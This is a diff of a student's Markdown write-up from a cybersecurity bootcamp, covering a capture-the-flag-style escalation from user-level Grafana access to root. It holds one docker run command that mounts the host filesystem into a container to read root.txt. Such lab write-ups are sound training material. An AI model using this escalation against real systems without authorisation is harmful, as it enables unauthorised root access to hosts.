gtech-mulearn/Cyber-Security-Bootcamp-Mulearn-OWASP-Kerala/AlvinDennis/Task-8/Task-8.md

 - After initial access to Grafana (user-level), the task required escalating to **root**.
 - Investigated available groups and accessible commands on the system.
-- Used a Docker-based bypass to obtain elevated privileges:
+- Used a Docker to obtain elevated privileges:

 ```bash
 docker run -it --entrypoint=/bin/bash -v /:/mnt/ ghcr.io/jroo1053/ctfscoreapache:master
 ```

 - After executing the container command and navigating the filesystem, a `root.txt` file was discovered containing the hidden flag.

-### Screenshot: Root file and confirmation

 ![Root flag discovery](./assets/9.png)